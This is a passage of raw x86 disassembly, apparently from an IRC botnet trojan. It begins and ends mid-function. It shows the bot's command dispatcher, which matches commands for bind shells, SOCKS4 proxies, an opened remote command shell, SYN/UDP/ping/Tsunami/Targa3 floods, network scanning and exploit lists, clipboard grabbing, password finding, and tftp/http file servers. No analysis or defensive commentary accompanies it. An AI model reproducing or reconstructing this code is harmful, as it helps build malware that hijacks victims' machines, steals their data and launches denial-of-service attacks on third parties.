jmp loc_4082CF
; ---------------------------------------------------------------------------
loc_40253B: ; CODE XREF: sub_401ACD+6B6�j
mov eax, [ebp+arg_8]
lea ecx, [eax+1]
mov al, [eax]
cmp al, byte_429094
mov [edi], ecx
jnz loc_401F75
loc_402551: ; CODE XREF: sub_401ACD+94A�j
mov edi, [edi]
push edi
push offset aC ; "c"
mov [ebp+arg_8], edi
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_40964C
push edi
push offset aK ; "k"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_40964C
cmp [ebp+var_A4], ebx
jnz short loc_4025A2
push [ebp+var_8C]
push offset dword_42CCC8
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_409644
loc_4025A2: ; CODE XREF: sub_401ACD+AB9�j
cmp [ebp+arg_28], ebx
jnz loc_409644
xor edi, edi
cmp dword_4294CC, ebx
jle loc_402757
mov [ebp+arg_20], offset dword_43DB90
loc_4025C0: ; CODE XREF: sub_401ACD+B12�j
push [ebp+arg_8]
push [ebp+arg_20]
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz short loc_4025E6
add [ebp+arg_20], 0B8h
inc edi
cmp edi, dword_4294CC
jl short loc_4025C0
jmp loc_402757
; ---------------------------------------------------------------------------
loc_4025E6: ; CODE XREF: sub_401ACD+B02�j
push offset asc_42CDC4 ; " :"
push [ebp+arg_0]
call sub_41C2E0
pop ecx
cmp eax, ebx
pop ecx
jz loc_401F75
mov cl, byte_429094
imul edi, 0B8h
mov [eax+2], cl
mov cl, byte_429094
mov [eax+3], cl
lea ecx, dword_43DBA8[edi]
push 9Fh
add eax, 4
push ecx
push eax
call sub_41BFD0
lea eax, [ebp+esi+var_50]
add esp, 0Ch
mov [ebp+arg_20], 0Fh
mov [ebp+arg_C], eax
loc_40263B: ; CODE XREF: sub_401ACD+C1F�j
push [ebp+arg_20]
lea eax, [ebp+var_A0]
push offset aD ; "$%d-"
push eax
call sub_41C266
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call sub_41C2E0
add esp, 14h
test eax, eax
jz short loc_4026A7
mov eax, [ebp+arg_C]
cmp [eax], ebx
jz short loc_4026A7
lea eax, dword_43DB90[edi]
push eax
call sub_41B9C0
add [ebp+var_C], eax
pop ecx
jz short loc_4026E2
mov eax, [ebp+arg_C]
push dword ptr [eax-4]
push [ebp+var_C]
call sub_41C2E0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_4026E2
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call sub_41843B
add esp, 0Ch
jmp short loc_4026E2
; ---------------------------------------------------------------------------
loc_4026A7: ; CODE XREF: sub_401ACD+B96�j
; sub_401ACD+B9D�j
mov eax, [ebp+arg_C]
cmp [eax], ebx
jnz short loc_4026E2
lea eax, [ebp+var_A0]
push 2
push eax
lea eax, [ebp+var_94]
push eax
call sub_41BFD0
lea eax, [ebp+var_94]
mov [ebp+var_92], bl
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call sub_41843B
add esp, 18h
loc_4026E2: ; CODE XREF: sub_401ACD+BAF�j
; sub_401ACD+BC3�j ...
dec [ebp+arg_20]
sub [ebp+arg_C], 4
cmp [ebp+arg_20], ebx
jg loc_40263B
lea eax, [ebp+esi+var_50]
mov [ebp+arg_20], 10h
mov edi, eax
loc_4026FF: ; CODE XREF: sub_401ACD+C7E�j
push [ebp+arg_20]
lea eax, [ebp+var_A0]
push offset aD_0 ; "$%d"
push eax
call sub_41C266
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call sub_41C2E0
add esp, 14h
test eax, eax
jz short loc_402742
mov eax, [edi]
cmp eax, ebx
jz short loc_402742
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call sub_41843B
add esp, 0Ch
loc_402742: ; CODE XREF: sub_401ACD+C5A�j
; sub_401ACD+C60�j
dec [ebp+arg_20]
sub edi, 4
cmp [ebp+arg_20], ebx
jg short loc_4026FF
mov [ebp+var_2C8], 1
loc_402757: ; CODE XREF: sub_401ACD+AE6�j
; sub_401ACD+B14�j
mov eax, [ebp+arg_8]
mov al, [eax]
cmp al, byte_429094
jz short loc_402770
cmp [ebp+var_2C8], ebx
jz loc_402961
loc_402770: ; CODE XREF: sub_401ACD+C95�j
push [ebp+arg_10]
mov edi, [ebp+arg_0]
push offset aMe ; "$me"
push edi
call sub_41843B
lea eax, [ebp+var_C4]
push eax
push offset aUser ; "$user"
push edi
call sub_41843B
push [ebp+var_88]
push offset aChan ; "$chan"
push edi
call sub_41843B
push ebx
push ebx
lea eax, [ebp+var_A0]
push 2
push eax
call sub_40AE84
push eax
push offset aRndnick ; "$rndnick"
push edi
call sub_41843B
add esp, 40h
push [ebp+arg_14]
push offset aServer ; "$server"
push edi
call sub_41843B
mov edi, offset aChr ; "$chr("
push edi
push [ebp+arg_0]
call sub_41C2E0
add esp, 14h
loc_4027E2: ; CODE XREF: sub_401ACD+E0D�j
test eax, eax
jz loc_4028DF
push edi
push [ebp+arg_0]
call sub_41C2E0
mov [ebp+arg_10], eax
add eax, 5
push 4
push eax
lea eax, [ebp+var_A0]
push eax
call sub_41BFD0
lea eax, [ebp+var_A0]
push offset asc_42CAAC ; ")"
push eax
call sub_41CAD4
add esp, 1Ch
cmp [ebp+var_A0], 30h
jl short loc_40282E
cmp [ebp+var_A0], 39h
jle short loc_402844
loc_40282E: ; CODE XREF: sub_401ACD+D56�j
push 3
lea eax, [ebp+var_A0]
push offset a63 ; "63"
push eax
call sub_41BFD0
add esp, 0Ch
loc_402844: ; CODE XREF: sub_401ACD+D5F�j
lea eax, [ebp+var_A0]
push eax
call sub_41C159
test eax, eax
pop ecx
jle short loc_40286A
lea eax, [ebp+var_A0]
push eax
call sub_41C159
pop ecx
mov [ebp+var_94], al
jmp short loc_40287E
; ---------------------------------------------------------------------------
loc_40286A: ; CODE XREF: sub_401ACD+D86�j
call sub_41C2C2
push 60h
cdq
pop ecx
idiv ecx
add dl, 20h
mov [ebp+var_94], dl
loc_40287E: ; CODE XREF: sub_401ACD+D9B�j
lea eax, [ebp+var_A0]
mov [ebp+var_93], bl
push eax
call sub_41B9C0
mov [ebp+arg_20], eax
push 0Ch
lea eax, [ebp+var_A0]
push ebx
push eax
call sub_41BF70
mov eax, [ebp+arg_20]
add eax, 6
push eax
lea eax, [ebp+var_A0]
push [ebp+arg_10]
push eax
call sub_41BFD0
lea eax, [ebp+var_94]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+arg_0]
call sub_41843B
push edi
push [ebp+arg_0]
call sub_41C2E0
add esp, 30h
jmp loc_4027E2
; ---------------------------------------------------------------------------
loc_4028DF: ; CODE XREF: sub_401ACD+D17�j
mov edi, 1FFh
lea eax, [ebp+var_428C]
push edi
push [ebp+arg_0]
push eax
call sub_41BFD0
lea eax, [ebp+var_428C]
push edi
push eax
lea eax, [ebp+var_4EF8]
push eax
call sub_41BFD0
lea eax, [ebp+var_4EF8]
push offset asc_42CDC0 ; " "
push eax
call sub_41CAD4
add esp, 20h
mov [ebp+var_90], eax
lea edi, [ebp+var_8C]
mov [ebp+arg_10], 1Fh
loc_40292F: ; CODE XREF: sub_401ACD+E77�j
push offset asc_42CDC0 ; " "
push ebx
call sub_41CAD4
mov [edi], eax
pop ecx
add edi, 4
dec [ebp+arg_10]
pop ecx
jnz short loc_40292F
mov ecx, [ebp+esi+var_90]
lea eax, [ebp+esi+var_90]
cmp ecx, ebx
jz loc_401F75
add ecx, 3
mov [eax], ecx
loc_402961: ; CODE XREF: sub_401ACD+C9D�j
mov edi, [ebp+esi+var_90]
push edi
push offset aRndnick_0 ; "rndnick"
mov [ebp+arg_8], edi
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4095F2
push edi
push offset aRn ; "rn"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4095F2
push edi
push offset aDi3 ; "di3"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4049B3
push edi
push offset aDi3 ; "di3"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4049B3
push edi
push offset aLogout ; "logout"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_404911
push edi
push offset aLo ; "lo"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_404911
push edi
push offset aVersion ; "version"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_404902
push edi
push offset aVer ; "ver"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_404902
push edi
push offset aRulez ; "rulez"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4048F8
push edi
push offset aRz ; "rz"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4048F8
push edi
push offset aSpeedtest ; "speedtest"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4048DF
push edi
push offset aSt ; "st"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4048DF
push edi
push offset aSecure ; "secure"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4047E1
push edi
push offset aSec ; "sec"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4047E1
push edi
push offset aUnsecure ; "unsecure"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4047E1
push edi
push offset aUnsec ; "unsec"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4047E1
push edi
push offset aBindshell ; "bindshell"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4046DB
push edi
push offset aBd ; "bd"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4046DB
push edi
push offset aBindshellstop ; "bindshellstop"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_402B0E
push [ebp+esi+var_8C]
push 6
push offset aServer_0 ; "Server"
push offset dword_42CA08
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402B0E: ; CODE XREF: sub_401ACD+1027�j
push edi
push offset aSocks4 ; "socks4"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4045B9
push edi
push offset aS4 ; "s4"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4045B9
push edi
push offset aSocks4stop ; "socks4stop"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_402B61
push [ebp+esi+var_8C]
push 19h
push offset aServer_0 ; "Server"
push offset dword_42C9E0
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402B61: ; CODE XREF: sub_401ACD+107A�j
push edi
push offset aRloginstop ; "rloginstop"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_402B8A
push [ebp+esi+var_8C]
push 9
push offset aServer_0 ; "Server"
push offset dword_42C9C4
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402B8A: ; CODE XREF: sub_401ACD+10A3�j
push edi
push offset aHttpstop ; "httpstop"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_402BB3
push [ebp+esi+var_8C]
push 3
push offset aServer_0 ; "Server"
push offset dword_42C9A8
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402BB3: ; CODE XREF: sub_401ACD+10CC�j
push edi
push offset aLogstop ; "logstop"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_402BDC
push [ebp+esi+var_8C]
push 25h
push offset aLogList ; "Log list"
push offset dword_42C988
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402BDC: ; CODE XREF: sub_401ACD+10F5�j
push edi
push offset aRedirectstop ; "redirectstop"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_402C05
push [ebp+esi+var_8C]
push 18h
push offset aTcpRedirect ; "TCP redirect"
push offset dword_42C958
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402C05: ; CODE XREF: sub_401ACD+111E�j
push edi
push offset aDdos_stop ; "ddos.stop"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_402C2E
push [ebp+esi+var_8C]
push 0Dh
push offset aDdosFlood ; "DDoS flood"
push offset dword_42C934
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402C2E: ; CODE XREF: sub_401ACD+1147�j
push edi
push offset aSynstop ; "synstop"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_402C57
push [ebp+esi+var_8C]
push 0Eh
push offset aSynFlood ; "Syn flood"
push offset dword_42C914
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402C57: ; CODE XREF: sub_401ACD+1170�j
push edi
push offset aSkysynstop ; "skysynstop"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_402C80
push [ebp+esi+var_8C]
push 10h
push offset aSkysynFlood ; "SkySyn flood"
push offset dword_42C8E8
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402C80: ; CODE XREF: sub_401ACD+1199�j
push edi
push offset aTarga3stop ; "targa3stop"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_402CA9
push [ebp+esi+var_8C]
push 11h
push offset aTarga3Flood ; "Targa3 flood"
push offset dword_42C8BC
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402CA9: ; CODE XREF: sub_401ACD+11C2�j
push edi
push offset aWonkstop ; "wonkstop"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_402CD2
push [ebp+esi+var_8C]
push 12h
push offset aWonkFlood ; "Wonk flood"
push offset dword_42C898
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402CD2: ; CODE XREF: sub_401ACD+11EB�j
push edi
push offset aPacketstop ; "packetstop"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_402E28
mov esi, [ebp+esi+var_8C]
mov edi, [ebp+arg_4]
push esi
push 0Dh
push offset aDdosFlood ; "DDoS flood"
push offset dword_42C934
push 1
push [ebp+var_4]
push [ebp+var_88]
push edi
call sub_40B648
push esi
push 0Eh
push offset aSynFlood ; "Syn flood"
push offset dword_42C914
push 1
push [ebp+var_4]
push [ebp+var_88]
push edi
call sub_40B648
add esp, 40h
push esi
push 17h
push offset aUdpFlood ; "UDP flood"
push offset dword_42C874
push 1
push [ebp+var_4]
push [ebp+var_88]
push edi
call sub_40B648
push esi
push 16h
push offset aPingFlood ; "Ping flood"
push offset dword_42C85C
push 1
push [ebp+var_4]
push [ebp+var_88]
push edi
call sub_40B648
add esp, 40h
push esi
push 11h
push offset aTarga3Flood ; "Targa3 flood"
push offset dword_42C8BC
push 1
push [ebp+var_4]
push [ebp+var_88]
push edi
call sub_40B648
push esi
push 12h
push offset aWonkFlood ; "Wonk flood"
push offset dword_42C898
push 1
push [ebp+var_4]
push [ebp+var_88]
push edi
call sub_40B648
add esp, 40h
push esi
push 0Fh
push offset aTsunamiFlood ; "Tsunami flood"
push offset dword_42C83C
push 1
push [ebp+var_4]
push [ebp+var_88]
push edi
call sub_40B648
push esi
push 13h
push offset aWisdomAttack ; "Wisdom attack"
push offset dword_42C81C
push 1
push [ebp+var_4]
push [ebp+var_88]
push edi
call sub_40B648
add esp, 40h
push esi
push 10h
push offset aSkysynFlood ; "SkySyn flood"
push offset dword_42C8E8
push 1
push [ebp+var_4]
push [ebp+var_88]
push edi
call sub_40B648
push ebx
push [ebp+var_4]
push offset unk_42C7E8
push [ebp+var_88]
push edi
call sub_409869
add esp, 34h
jmp loc_401F75
; ---------------------------------------------------------------------------
loc_402E28: ; CODE XREF: sub_401ACD+1214�j
push edi
push offset aTsunamistop ; "tsunamistop"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_402E51
push [ebp+esi+var_8C]
push 0Fh
push offset aTsunamiFlood ; "Tsunami flood"
push offset dword_42C83C
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402E51: ; CODE XREF: sub_401ACD+136A�j
push edi
push offset aWisdomstop ; "wisdomstop"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_402E7A
push [ebp+esi+var_8C]
push 13h
push offset aWisdomAttack ; "Wisdom attack"
push offset dword_42C81C
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402E7A: ; CODE XREF: sub_401ACD+1393�j
push edi
push offset aUdpstop ; "udpstop"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_402EA3
push [ebp+esi+var_8C]
push 17h
push offset aUdpFlood ; "UDP flood"
push offset dword_42C874
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402EA3: ; CODE XREF: sub_401ACD+13BC�j
push edi
push offset aPingstop ; "pingstop"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_402ECC
push [ebp+esi+var_8C]
push 16h
push offset aPingFlood ; "Ping flood"
push offset dword_42C85C
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402ECC: ; CODE XREF: sub_401ACD+13E5�j
push edi
push offset aTftpstop ; "tftpstop"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_402EF5
push [ebp+esi+var_8C]
push 5
push offset aServer_0 ; "Server"
push offset dword_42C7A0
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402EF5: ; CODE XREF: sub_401ACD+140E�j
push edi
push offset aFindfilestop ; "findfilestop"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4045A1
push edi
push offset aFfstop ; "ffstop"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4045A1
push edi
push offset aProcsstop ; "procsstop"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_404589
push edi
push offset aPsstop ; "psstop"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_404589
push edi
push offset aClonestop ; "clonestop"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_402F72
push [ebp+esi+var_8C]
push 1Fh
push offset aClone ; "Clone"
push offset dword_42C750
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402F72: ; CODE XREF: sub_401ACD+148B�j
push edi
push offset aSecurestop ; "securestop"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_402F9B
push [ebp+esi+var_8C]
push 22h
push offset aSecure_0 ; "Secure"
push offset dword_42C72C
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402F9B: ; CODE XREF: sub_401ACD+14B4�j
push edi
push offset aScanstop ; "scanstop"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_402FC4
push [ebp+esi+var_8C]
push 0Bh
push offset aScan ; "Scan"
push offset dword_42C70C
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_402FC4: ; CODE XREF: sub_401ACD+14DD�j
push edi
push offset aScanstats ; "scanstats"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_404573
push edi
push offset aStats ; "stats"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_404573
push edi
push offset aTransferstats ; "transferstats"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_40455D
push edi
push offset aTrstats ; "trstats"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_40455D
push edi
push offset aConnectbacksta ; "connectbackstats"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_404547
push edi
push offset aCbstats ; "cbstats"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_404547
push edi
push offset aExploitlist ; "exploitlist"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_404531
push edi
push offset aExplist ; "explist"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_404531
push edi
push offset aReconnect ; "reconnect"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_404512
push edi
push offset aR ; "r"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_404512
push edi
push offset aDisconnect ; "disconnect"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4044F0
push edi
push offset aDc ; "dc"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4044F0
push edi
push offset aQuit_0 ; "quit"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4044A8
push edi
push offset aQ ; "q"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4044A8
push edi
push offset aStatus ; "status"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_404494
push edi
push offset aS_5 ; "s"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_404494
push edi
push offset aId ; "id"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_40445D
push edi
push offset aI ; "i"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_40445D
push edi
push offset aR3start ; "r3start"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_403190
call sub_418884
test eax, eax
mov eax, offset unk_42C64C
jnz short loc_403162
mov eax, offset unk_42C628
loc_403162: ; CODE XREF: sub_401ACD+168E�j
push eax
lea eax, [ebp+var_2C4]
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409869
add esp, 1Ch
jmp loc_4082DE
; ---------------------------------------------------------------------------
loc_403190: ; CODE XREF: sub_401ACD+1680�j
push edi
push offset aThreads ; "threads"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_40437E
push edi
push offset aT ; "t"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_40437E
push edi
push offset aAliases ; "aliases"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_40435B
push edi
push offset aAl ; "al"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_40435B
push edi
push offset aLog ; "log"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_404268
push edi
push offset aLg ; "lg"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_404268
push edi
push offset aClearlog ; "clearlog"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_40424C
push edi
push offset aClg ; "clg"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_40424C
push edi
push offset aNetinfo ; "netinfo"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_404212
push edi
push offset aNi ; "ni"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_404212
push edi
push offset aSysinfo ; "sysinfo"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4041E7
push edi
push offset aSi ; "si"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4041E7
push edi
push offset aKosomaky4d ; "KOSOMAKY4D"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4041AD
push edi
push offset aKosomaky4d ; "KOSOMAKY4D"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4041AD
push edi
push offset aProcs ; "procs"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_40408D
push edi
push offset aPs ; "ps"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_40408D
push edi
push offset aUptime ; "uptime"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_404005
push edi
push offset aUp ; "up"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_404005
push edi
push offset aDriveinfo ; "driveinfo"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_403FE8
push edi
push offset aDrv ; "drv"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_403FE8
push edi
push offset aTestdlls ; "testdlls"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_403FCF
push edi
push offset aDll ; "dll"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_403FCF
push edi
push offset aOpencmd ; "opencmd"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_403F5B
push edi
push offset aOcmd ; "ocmd"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_403F5B
push edi
push offset aCmdstop ; "cmdstop"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_4033B1
push [ebp+esi+var_8C]
push 0Ah
push offset aRemoteShell ; "Remote shell"
push offset dword_42C568
jmp loc_408D08
; ---------------------------------------------------------------------------
loc_4033B1: ; CODE XREF: sub_401ACD+18CA�j
push edi
push offset dword_42C564
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_4034C7
cmp [ebp+var_8], ebx
jnz short loc_4033E5
push ebx
push [ebp+var_4]
push offset dword_42C550
push [ebp+var_88]
push [ebp+arg_4]
call sub_409869
add esp, 14h
loc_4033E5: ; CODE XREF: sub_401ACD+18FC�j
mov eax, [ebp+arg_18]
xor edi, edi
mov [ebp+arg_18], eax
jmp short loc_4033F2
; ---------------------------------------------------------------------------
loc_4033EF: ; CODE XREF: sub_401ACD+196C�j
mov eax, [ebp+arg_18]
loc_4033F2: ; CODE XREF: sub_401ACD+1920�j
cmp [eax], bl
jz short loc_4033F9
inc eax
jmp short loc_4033FE
; ---------------------------------------------------------------------------
loc_4033F9: ; CODE XREF: sub_401ACD+1927�j
mov eax, offset aEmpty ; "<Empty>"
loc_4033FE: ; CODE XREF: sub_401ACD+192A�j
push eax
push edi
lea eax, [ebp+var_2C4]
push offset aD_S ; "%d. %s"
push eax
call sub_41C266
push 1
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409869
add [ebp+arg_18], 80h
add esp, 24h
inc edi
cmp edi, 3
jl short loc_4033EF
push offset unk_42C520
call sub_415D38
pop ecx
loc_403446: ; CODE XREF: sub_401ACD+1BFD�j
; sub_401ACD+2EFA�j
mov edi, [ebp+esi+var_8C]
cmp edi, ebx
mov [ebp+arg_20], edi
jz loc_401F75
push [ebp+arg_8]
push offset aSpoof ; "spoof"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_404AAB
push offset aOff ; "off"
push edi
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_4049D9
lea eax, [ebp+var_2C4]
push offset unk_42C4EC
push eax
mov dword_4CF180, ebx
call sub_41C266
pop ecx
pop ecx
loc_40349D: ; CODE XREF: sub_401ACD+2FD9�j
cmp [ebp+var_8], ebx
jnz loc_409644
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409869
loc_4034BF: ; CODE XREF: sub_401ACD+7032�j
add esp, 14h
jmp loc_409644
; ---------------------------------------------------------------------------
loc_4034C7: ; CODE XREF: sub_401ACD+18F3�j
push edi
push offset aGetclip ; "getclip"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_403F1A
push edi
push offset aGc ; "gc"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_403F1A
push edi
push offset aFlusharp ; "flusharp"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_403F03
push edi
push offset aFarp ; "farp"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_403F03
push edi
push offset aFlushdns ; "flushdns"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_403ECB
push edi
push offset aFdns ; "fdns"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_403ECB
push edi
push offset aCurrentip ; "currentip"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_403E91
push edi
push offset aCip ; "cip"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_403E91
push edi
push offset aRloginserver ; "rloginserver"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_403D56
push edi
push offset aRlogin ; "rlogin"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_403D56
push edi
push offset aHttpserver ; "httpserver"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_403BCA
push edi
push offset aHttp ; "http"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_403BCA
push edi
push offset aTftpserver ; "tftpserver"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_403A90
push edi
push offset aTftp ; "tftp"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_403A90
push edi
push offset aShitycrash ; "shitycrash"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_403653
lea eax, [ebp+var_2C4]
push offset unk_42C444
push eax
call sub_41C266
cmp [ebp+var_8], ebx
pop ecx
pop ecx
jnz short loc_403632
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409869
add esp, 14h
loc_403632: ; CODE XREF: sub_401ACD+1B47�j
lea eax, [ebp+var_2C4]
push eax
call sub_415D38
mov [esp+10h+var_10], offset aShitycrash ; "shitycrash"
push [ebp+esi+var_7C]
call sub_41CA50
jmp loc_4097D0
; ---------------------------------------------------------------------------
loc_403653: ; CODE XREF: sub_401ACD+1B2F�j
push edi
push offset aAsc ; "asc"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_403789
push edi
push offset aAs ; "as"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_403789
push edi
push offset aPhonehome ; "phonehome"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_4036AA
lea eax, [ebp+var_C4]
push eax
push offset aNoticeSPhoning ; "NOTICE %s :PHONING HOME: DADI Are You T"...
push [ebp+arg_4]
call sub_409823
loc_4036A2: ; CODE XREF: sub_401ACD+47B�j
add esp, 0Ch
jmp loc_401F75
; ---------------------------------------------------------------------------
loc_4036AA: ; CODE XREF: sub_401ACD+1BBF�j
push edi
push offset aFindpass ; "findpass"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz short loc_4036D0
push edi
